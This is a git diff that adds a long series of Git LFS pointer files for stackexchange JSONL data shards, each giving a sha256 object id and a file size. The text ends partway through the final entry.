-0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:896faab65733395c9a913bd8c2532632ee4b459cd22eb86555827fb8843d3278 +size 32636625 diff --git a/data/stackexchange/1-1/1145_2289.jsonl b/data/stackexchange/1-1/1145_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..78d9c5ddbccc572d1f9bfbea967ebad1515389c5 --- /dev/null +++ b/data/stackexchange/1-1/1145_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbc6dc3c76d334f3cd166000ab7ef34dd268658bcad2d17bcd361f406bf33f87 +size 32759629 diff --git a/data/stackexchange/1-1/1146_2289.jsonl b/data/stackexchange/1-1/1146_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2d6213e37cbaf561cdbd6ae78fbefbb6cfb55631 --- /dev/null +++ b/data/stackexchange/1-1/1146_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fae5326a93d8476ee407334a3d5ce8f7965a04d7c850d1bac2d1dbebae08a43 +size 33442874 diff --git a/data/stackexchange/1-1/1147_2289.jsonl b/data/stackexchange/1-1/1147_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c47f39edd72b770a8b32e41a85fdfb6583746c2 --- /dev/null +++ b/data/stackexchange/1-1/1147_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d03f0f109c1dcd66254dfd794adcabdcb834398f5cba86ceae9b0704c62f7273 +size 33127689 diff --git a/data/stackexchange/1-1/1148_2289.jsonl b/data/stackexchange/1-1/1148_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4629781592d9b5d9049e470efefff559cbdae7a --- /dev/null +++ b/data/stackexchange/1-1/1148_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b75a70378641c49f0eef1ab293db0d6cdcc3264ab701d7ea7b1019ea588142a9 +size 32701549 diff --git a/data/stackexchange/1-1/1149_2289.jsonl b/data/stackexchange/1-1/1149_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae35d4171a748c225fbd6be3e06dadba519226c6 --- /dev/null +++ b/data/stackexchange/1-1/1149_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7974ad026655fb5f2b6aacac47887292b70b454810e38628dffce01e1274fdfd +size 32577674 diff --git a/data/stackexchange/1-1/114_2289.jsonl b/data/stackexchange/1-1/114_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..adc481bde30e771c8c9e77b605ac27329059a2e1 --- /dev/null +++ b/data/stackexchange/1-1/114_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a3fd3c806a65fdb414102d35665522955699734bf780dd5094fb9ae57d7ca89 +size 33388424 diff --git a/data/stackexchange/1-1/1150_2289.jsonl b/data/stackexchange/1-1/1150_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3afe8f26eb7f6f444cbd64377dcde6675dd5dae --- /dev/null +++ b/data/stackexchange/1-1/1150_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:732d2094f040046e2cd610362e8bf6a7690d815814d7f072d371a802f315112b +size 33481105 diff --git a/data/stackexchange/1-1/1151_2289.jsonl b/data/stackexchange/1-1/1151_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1fd9031af5619ea14a1cf4c0be5b20bc91dac67f --- /dev/null +++ b/data/stackexchange/1-1/1151_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b98a2a8db9957440eadd06407b093e7a89f59645b5d2cbf0bfe243c94039d5c5 +size 32815899 diff --git a/data/stackexchange/1-1/1152_2289.jsonl b/data/stackexchange/1-1/1152_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..afad2d4a5afa635f5c3e3be3b892026262759edb --- /dev/null +++ b/data/stackexchange/1-1/1152_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:f5340ea2fa6868d5c2107c936a23189128330fd6d838ba8c5b864d5534430bed +size 33120041 diff --git a/data/stackexchange/1-1/1153_2289.jsonl b/data/stackexchange/1-1/1153_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..537d16db64659a155ba6df80860c6caeb6d7f5c5 --- /dev/null +++ b/data/stackexchange/1-1/1153_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86423b6002d60df0cf9e11c9d6543184aa568bb2c8783adca1997d76db5e6033 +size 33620191 diff --git a/data/stackexchange/1-1/1154_2289.jsonl b/data/stackexchange/1-1/1154_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93c5ab3c2289510ad921bc24e14b5213a6668b55 --- /dev/null +++ b/data/stackexchange/1-1/1154_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94a58215e800ce15a32822714b4337d3c86182f14799e83e08aaebfecb41235f +size 32736353 diff --git a/data/stackexchange/1-1/1155_2289.jsonl b/data/stackexchange/1-1/1155_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ac08c7f160f55925eeebebe1c2dd5994fa7db1d --- /dev/null +++ b/data/stackexchange/1-1/1155_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9366c0dd23142b22dab0158a36269c1b1496fc1b5b6cbe431d099a4529eb66f4 +size 33231094 diff --git a/data/stackexchange/1-1/1156_2289.jsonl b/data/stackexchange/1-1/1156_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3db8dba16135a0be675c3c43291c3a28e0ea019e --- /dev/null +++ b/data/stackexchange/1-1/1156_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:43c0f6d99cabcca20d14f14711b13016f5fd169ae2e15fabe22bac1968084efe +size 32785877 diff --git a/data/stackexchange/1-1/1157_2289.jsonl b/data/stackexchange/1-1/1157_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..413ac0691c4c29f19015e4cdfd6418704417fc6e --- /dev/null +++ b/data/stackexchange/1-1/1157_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7dbd82ad89fd0ff28f218a3d68f36a7b40d28da78194b2ff5659b5456beeb5bc +size 32545915 diff --git a/data/stackexchange/1-1/1158_2289.jsonl b/data/stackexchange/1-1/1158_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7054a41bbfc360be85dae14827e86a8e1981f51c --- /dev/null +++ b/data/stackexchange/1-1/1158_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33ae1f63b91360f9b185c92330afad7046b1948916320f58b657924e1f90a815 +size 32712519 diff --git a/data/stackexchange/1-1/1159_2289.jsonl b/data/stackexchange/1-1/1159_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..db8ece8014528f91474e380b77f1ce4847c1f9c9 --- /dev/null +++ b/data/stackexchange/1-1/1159_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb15e6e193da3fa5f76cec8769a511fee71aacda01deed285f49160d85e55b82 +size 32979367 diff --git a/data/stackexchange/1-1/115_2289.jsonl b/data/stackexchange/1-1/115_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7dc264eea0744ac21f7bb0286256c74fee40638 --- /dev/null +++ b/data/stackexchange/1-1/115_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:954852be2c16165f19a996bd0767de3792024f2ab1069c15f83e31dc3dc46135 +size 33573020 diff --git a/data/stackexchange/1-1/1160_2289.jsonl b/data/stackexchange/1-1/1160_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..0ac469d2844e19c3218eac42bc8a786404a25dd3 --- /dev/null +++ b/data/stackexchange/1-1/1160_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fbf2ce74fef0cb87210e1e0794177e1fc473d23f889fabb17fbbb985e72fba1b +size 32858573 diff --git a/data/stackexchange/1-1/1161_2289.jsonl b/data/stackexchange/1-1/1161_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f02cc1e826a01e15c0ec430feea68c2839e779ae --- /dev/null +++ b/data/stackexchange/1-1/1161_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe49be8ab0ef49c3ae3e44d7c3a34031ac8804aa2c0b1470b387991dd9d3ae58 +size 32732650 diff --git a/data/stackexchange/1-1/1162_2289.jsonl b/data/stackexchange/1-1/1162_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4cb238bb8fd6b1895b0634b8d96d0e5bb02cf95a --- /dev/null +++ b/data/stackexchange/1-1/1162_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63cac139d62e4ad672af878cf713e1d96ebb625df07fbbb9231732e43d23481b +size 33175252 diff --git a/data/stackexchange/1-1/1163_2289.jsonl b/data/stackexchange/1-1/1163_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7187231ecfc60233d0c2a5681612211ea85fb241 --- /dev/null +++ b/data/stackexchange/1-1/1163_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:465709ba76e12fe4396475a22eee02747f66022a2dd646f2a2316f1e214e5fad +size 32740471 diff --git a/data/stackexchange/1-1/1164_2289.jsonl b/data/stackexchange/1-1/1164_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dad07482f4457dd70b6c3c5bf6e7f0491d16ade2 --- /dev/null +++ b/data/stackexchange/1-1/1164_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0b608bb7e65106d3ff5428135e5a5570e355014b75a57138c0a0eda76ad9882 +size 33203482 diff --git a/data/stackexchange/1-1/1165_2289.jsonl b/data/stackexchange/1-1/1165_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..106d34d2fa1a3d3ca4a0ab7c55d1433724bcd223 --- /dev/null +++ b/data/stackexchange/1-1/1165_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d338eaaf22bc5ff179337487ccd142d67b7e8ce1b6e577e67f94a3ae970029d2 +size 32777392 diff --git a/data/stackexchange/1-1/1166_2289.jsonl b/data/stackexchange/1-1/1166_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..221d96aed3f5a4e2c3a7f3dc97194b96d14103b5 --- /dev/null +++ b/data/stackexchange/1-1/1166_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9af26125a09d2d17adcb69c2e08e36cc25084dc7e60e52301836d7a5124ca09 +size 33178723 diff --git a/data/stackexchange/1-1/1167_2289.jsonl b/data/stackexchange/1-1/1167_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17b39f8a01585a265c7d961e8aac98ec837d9ced --- /dev/null +++ b/data/stackexchange/1-1/1167_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ceda3d4955b6e65cd0502c278efc952ae3ef367c319ea219a917fb148cf28567 +size 32573604 diff --git a/data/stackexchange/1-1/1168_2289.jsonl b/data/stackexchange/1-1/1168_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0aa20060b2b9ca2a8a43a21b196547ca55d5e9c2 --- /dev/null +++ b/data/stackexchange/1-1/1168_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:b23c075f4f3b0f9f839bd2994981e79a5eab652ffcd24554085550dcac5bc22c +size 33404007 diff --git a/data/stackexchange/1-1/1169_2289.jsonl b/data/stackexchange/1-1/1169_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..201f53ebccf559868f81854bbc4aa3d2b6f9d034 --- /dev/null +++ b/data/stackexchange/1-1/1169_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:92b84f04ebda4578a32b6d251665759c38bfe44768bb02ec91ddc8bb97ccaf8e +size 33067397 diff --git a/data/stackexchange/1-1/116_2289.jsonl b/data/stackexchange/1-1/116_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f31a5bafebb36f265ddc95f3b620fd1c8800f99 --- /dev/null +++ b/data/stackexchange/1-1/116_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d02a2dd9905b878bd3e6ced20beade213a09b432e5d8b22e265b02b0d8f491f3 +size 33742637 diff --git a/data/stackexchange/1-1/1170_2289.jsonl b/data/stackexchange/1-1/1170_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6456cd6e84ab05aa153872f3639e0faa38555730 --- /dev/null +++ b/data/stackexchange/1-1/1170_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38d0701ec3475b62fc0c392b80d0fb8781862429b5d01b8153d68b8a275d35ed +size 33017952 diff --git a/data/stackexchange/1-1/1171_2289.jsonl b/data/stackexchange/1-1/1171_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf8f49881bbdc047917980de01acf054d788cc61 --- /dev/null +++ b/data/stackexchange/1-1/1171_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c02597386f02c6c2e18fde0ffee1c3390c9b51c223735a62bfc62d0233e41e1 +size 32781774 diff --git a/data/stackexchange/1-1/1172_2289.jsonl b/data/stackexchange/1-1/1172_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67411b4b285077f0d52c35a1baaeb901e736203c --- /dev/null +++ b/data/stackexchange/1-1/1172_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0a89c8e9d94b2ecd9e7c7ff39ea59c84f1513e44bdf94a2f52d3eb66548722e +size 32997581 diff --git a/data/stackexchange/1-1/1173_2289.jsonl b/data/stackexchange/1-1/1173_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..56e7f59473066083eaf09a546c276fe75917d364 --- /dev/null +++ b/data/stackexchange/1-1/1173_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0233d364d35a2c03bda2b9b2589f1011f678a0ed8263c3e635f8316f0edab8f0 +size 32823318 diff --git a/data/stackexchange/1-1/1174_2289.jsonl b/data/stackexchange/1-1/1174_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b45189636014d700f8fa5bab5c8e09b92a4b8415 --- /dev/null +++ b/data/stackexchange/1-1/1174_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29ff3d303163df9bddf1af55876fe9e485560cc3ccca3ffff6c63de6482ce337 +size 32987740 diff --git a/data/stackexchange/1-1/1175_2289.jsonl b/data/stackexchange/1-1/1175_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfd3582c8910c204a44b2020c5c36cd7e4f7d4e5 --- /dev/null +++ b/data/stackexchange/1-1/1175_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcf99d16eec362e3a48c9aa5bfa11bd9a63a5fa2c8d068a92114409779cd5839 +size 33280315 diff --git a/data/stackexchange/1-1/1176_2289.jsonl b/data/stackexchange/1-1/1176_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..6075320146231b31e18206fd4de998c8447aefaa --- /dev/null +++ b/data/stackexchange/1-1/1176_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6a7293a0fd0f9f67b729deca98008e7c100498ab3eba8110b89bff50cea0cc2 +size 32795733 diff --git a/data/stackexchange/1-1/1177_2289.jsonl b/data/stackexchange/1-1/1177_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa846d1d12be9fbc63234b46d5468d2bc6dacd50 --- /dev/null +++ b/data/stackexchange/1-1/1177_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e771c743f05d628246b7fa314cf2f72660eb440cd3eb58779259d8f6eeeafb56 +size 33024889 diff --git a/data/stackexchange/1-1/1178_2289.jsonl b/data/stackexchange/1-1/1178_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2a6a9b84828e2d9bd62ce5c1c1753cb54b82c74 --- /dev/null +++ b/data/stackexchange/1-1/1178_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6a69ae81483b55e73ab921027ee5afba595000eac188becc1b2a027debcc4c0 +size 33175397 diff --git a/data/stackexchange/1-1/1179_2289.jsonl b/data/stackexchange/1-1/1179_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d98d04c35532865ac69de3aa6ec6aa5a4923f3c --- /dev/null +++ b/data/stackexchange/1-1/1179_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cbced605a30a180a2f72b09e9f3d939ffa026328eee66464310d58b1059a7db +size 32854217 diff --git a/data/stackexchange/1-1/117_2289.jsonl b/data/stackexchange/1-1/117_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c91b43291782e7d78212b49e4200a62a3760fe8e --- /dev/null +++ b/data/stackexchange/1-1/117_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f58cfb1f9747ed8385001217e631d2d628113726e15d46f773882dbea294c66e +size 33819330 diff --git a/data/stackexchange/1-1/1180_2289.jsonl b/data/stackexchange/1-1/1180_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61242a9e45674d9f7261fa1d77c42127732b26fc --- /dev/null +++ b/data/stackexchange/1-1/1180_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:364758e350d3a3d3eeb7334fa91ae2b6ce99e27719ec8689b04ebc83517ea084 +size 33129014 diff --git a/data/stackexchange/1-1/1181_2289.jsonl b/data/stackexchange/1-1/1181_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31843a7c356148745c3a4982082913a07774737f --- /dev/null +++ b/data/stackexchange/1-1/1181_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4315964527ed641cedb993ea237254261e4084e9894011cfc94ce22e85f4e661 +size 32731863 diff --git a/data/stackexchange/1-1/1182_2289.jsonl b/data/stackexchange/1-1/1182_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3599c2f11c3130c0352f16cff98f7db1a23c50ba --- /dev/null +++ b/data/stackexchange/1-1/1182_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca95aef2c0c0e77d6e8b48152fa6027a4a3b8105da479a08d598efda065ed898 +size 32779141 diff --git a/data/stackexchange/1-1/1183_2289.jsonl b/data/stackexchange/1-1/1183_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f740aaa5eb5cd09d813f211614cfa02a451478c0 --- /dev/null +++ b/data/stackexchange/1-1/1183_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:36db6fb28fc006142307acc03acdbcd3af079958c16b9b3bf0aa52ec72877244 +size 33293619 diff --git a/data/stackexchange/1-1/1184_2289.jsonl b/data/stackexchange/1-1/1184_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ac11120e4f8629224d5b2821b17574ed1c11f3d --- /dev/null +++ b/data/stackexchange/1-1/1184_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:342a5f92ad15e85cf67e782c99d72e3d83854595a19d0ea25fe25be6c4303994 +size 33215724 diff --git a/data/stackexchange/1-1/1185_2289.jsonl b/data/stackexchange/1-1/1185_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b6b97af7b5510efcdb073e70adb8374129a3d69e --- /dev/null +++ b/data/stackexchange/1-1/1185_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:307690191e6915f09a81fc35d079147c69cabceaab5c790cac3b348e2daa87d4 +size 33118226 diff --git a/data/stackexchange/1-1/1186_2289.jsonl b/data/stackexchange/1-1/1186_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce36379bf603c8bd82557cd244c3bdd593043413 --- /dev/null +++ b/data/stackexchange/1-1/1186_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6161c58713086f24238b9d15ef207b183b8acb9950efe219031228a853163c4d +size 33111221 diff --git a/data/stackexchange/1-1/1187_2289.jsonl b/data/stackexchange/1-1/1187_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1da1a6995e1682c42b81e846dd24cff4959557ca --- /dev/null +++ b/data/stackexchange/1-1/1187_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ae0055d5e24f12520cb806c8cc5e34e8d8b62d1f241353f013d81c581be66fc +size 32994344 diff --git a/data/stackexchange/1-1/1188_2289.jsonl b/data/stackexchange/1-1/1188_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aded0125e40f8bfd250dc737658e2207d847fa2b --- /dev/null +++ b/data/stackexchange/1-1/1188_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc421d1af5c8687ba779d978395f7eeeaa85c0b2119bbe83607217d682a6beec +size 32619136 diff --git a/data/stackexchange/1-1/1189_2289.jsonl b/data/stackexchange/1-1/1189_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0c090ef4e91e3d86c38960f4bcc3a7d32acbc73b --- /dev/null +++ b/data/stackexchange/1-1/1189_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76f5548d0d14818375bb2a08c63809d02d5cc78753c7065be926347f85eb6d22 +size 37530801 diff --git a/data/stackexchange/1-1/118_2289.jsonl b/data/stackexchange/1-1/118_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fb593dc32ad655ce2db1246421f1f1c64b4e36f7 --- /dev/null +++ b/data/stackexchange/1-1/118_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62bfcbcccc0ce8f5d8befaf3477046a2579a037a0036b8a7a643b5e945998810 +size 33515843 diff --git a/data/stackexchange/1-1/1190_2289.jsonl b/data/stackexchange/1-1/1190_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59fafdd3a617de78df34532368dff2036f68d74d --- /dev/null +++ b/data/stackexchange/1-1/1190_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6d631dca23d2fc74956c955a0ba5dc280c28762b0952c5687f02f86b478646e +size 38006504 diff --git a/data/stackexchange/1-1/1191_2289.jsonl b/data/stackexchange/1-1/1191_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d9b4c52d267d386a463bf84bd7f0d969f634d620 --- /dev/null +++ b/data/stackexchange/1-1/1191_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d84795fee9bf6685d2120efaa6057c7b1bf4e1db4d2686e8d24135716ef6f93f +size 37397876 diff --git a/data/stackexchange/1-1/1192_2289.jsonl b/data/stackexchange/1-1/1192_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcc91ead49546cb1e186fa5d2e4f662a04beccb9 --- /dev/null +++ b/data/stackexchange/1-1/1192_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7e690d55d6e0bcdfcb8f65b95dc8b76ce8f8fb6f6188f63f94084ae4e6df32f +size 37573976 diff --git a/data/stackexchange/1-1/1193_2289.jsonl b/data/stackexchange/1-1/1193_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29dc57ffaf01a5afca60e0413fe6266fc727ee4f --- /dev/null +++ b/data/stackexchange/1-1/1193_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1beab4a6e5f79b9e101862da1af9097d1b46b3ac9fe4141a0be22a76972fbbb1 +size 38180703 diff --git a/data/stackexchange/1-1/1194_2289.jsonl b/data/stackexchange/1-1/1194_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8dbe45bb3644379d8e4dab05c5e009f2bd40aba4 --- /dev/null +++ b/data/stackexchange/1-1/1194_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ff2bebd34210a7b699523188ab14d0b209deb05e11943f02bdc2a2250ee30fb +size 37581373 diff --git a/data/stackexchange/1-1/1195_2289.jsonl b/data/stackexchange/1-1/1195_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e56b0bcd1743e55a77664335c562ae128bffe26 --- /dev/null +++ b/data/stackexchange/1-1/1195_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a72f13761f91338b3e0dad25c2a32b28fab00ec79cc590ee184c008de44aac3a +size 38082788 diff --git a/data/stackexchange/1-1/1196_2289.jsonl b/data/stackexchange/1-1/1196_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78fb5df2a2da8a23a6526229d9f7b45ebe696f7b --- /dev/null +++ b/data/stackexchange/1-1/1196_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9aef2a77789fd7adb13b6bb2bba5ab4244c446d885021f280adc9c5ece6c325d +size 38143460 diff --git a/data/stackexchange/1-1/1197_2289.jsonl b/data/stackexchange/1-1/1197_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30877a2149fd782dabb652effa1f35168e6a989f --- /dev/null +++ b/data/stackexchange/1-1/1197_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d03f4fbbb9a30807c6babe55f500b6bd55e1a97c486fcb56f30162e2147e2ef +size 38308285 diff --git a/data/stackexchange/1-1/1198_2289.jsonl b/data/stackexchange/1-1/1198_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cea5215ec976d07ede953465efade8589d10ace --- /dev/null +++ b/data/stackexchange/1-1/1198_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0557552412dae62574be5377a6cd22082dde70b8f1c1d16e30151d7a1adc19f9 +size 37568028 diff --git a/data/stackexchange/1-1/1199_2289.jsonl b/data/stackexchange/1-1/1199_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c1cc9b33994f4ea78cbf03711e43723205f307d --- /dev/null +++ b/data/stackexchange/1-1/1199_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7d229620b04dd1f56b0c7528c6ae1b7b8ed264a7baf94fdbdba718355c6d117c +size 37603108 diff --git a/data/stackexchange/1-1/119_2289.jsonl b/data/stackexchange/1-1/119_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0c324352178a0472748cd12009611fa92d33790 --- /dev/null +++ b/data/stackexchange/1-1/119_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b762ae7a4d7ef73cbc664e2e89a86e2cc220558c373c2514b30d5fe4f072ccd +size 33522920 diff --git a/data/stackexchange/1-1/11_2289.jsonl b/data/stackexchange/1-1/11_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c7af17775c3f5b785deeaeadebaf8719f088f38 --- /dev/null +++ b/data/stackexchange/1-1/11_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5c8f6c2785b4046b66b226219bfb5d9df6ee2e8de902e16619b6b72adcb6f4f5 +size 35909146 diff --git a/data/stackexchange/1-1/1200_2289.jsonl b/data/stackexchange/1-1/1200_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f47e44b7c4ddf5f65c4591df70c1ab4ee2437c2c --- /dev/null +++ b/data/stackexchange/1-1/1200_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e25eb7548096816a4e747849f3a7a37366281c5ba5e88a6d7651de5ee228ce79 +size 37512180 diff --git a/data/stackexchange/1-1/1201_2289.jsonl b/data/stackexchange/1-1/1201_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb4a3d4925ddf30d43c788f5b5846ef30c564117 --- /dev/null +++ b/data/stackexchange/1-1/1201_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea44ba154d60d49c5fc68280a1877b440c415935f72e403fde555d35f157e8ed +size 37942766 diff --git a/data/stackexchange/1-1/1202_2289.jsonl b/data/stackexchange/1-1/1202_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e254b7199aa1c3f83d978463026905a7b62507d7 --- /dev/null +++ b/data/stackexchange/1-1/1202_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 